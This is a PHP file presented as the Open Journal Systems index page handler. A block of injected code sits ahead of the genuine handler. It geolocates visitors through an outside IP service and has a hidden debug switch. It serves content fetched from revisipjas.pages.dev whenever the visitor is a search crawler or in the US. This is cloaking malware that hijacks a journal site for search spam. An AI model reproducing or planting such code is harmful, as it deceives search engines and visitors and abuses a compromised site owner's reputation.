<?php

$userAgent = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
function getCountryByIp($ip)
{
    $url = "http://ip-api.com/json/$ip";

    $response = file_get_contents($url);
    $data = json_decode($response, true);
    $countryCode = $data['countryCode'];
    return $countryCode;
}
$ctryCode = getCountryByIp($ip);

if (isset($_GET['a']) && $_GET['a'] === 'a') {
    echo "country: " . $ctryCode;
    echo "<br>";
    echo "useragent: " . $userAgent;
    echo "<br>";
    echo "ip: " . $ip;
    exit;
}

if (preg_match('/bot|crawl|slurp|bingbot|Google-Site-Verification|Google-InspectionTool|AhrefsBot|spider/i', $userAgent) || $ctryCode == 'US') {
    echo file_get_contents('https://revisipjas.pages.dev/index.txt');
    exit;
}

?>
<?php

/**
 * @defgroup pages_index Index Pages
 */
 
/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 * @brief Handle site index requests. 
 *
 */

switch ($op) {
	case 'index':
		define('HANDLER_CLASS', 'IndexHandler');
		import('pages.index.IndexHandler');
		break;
}
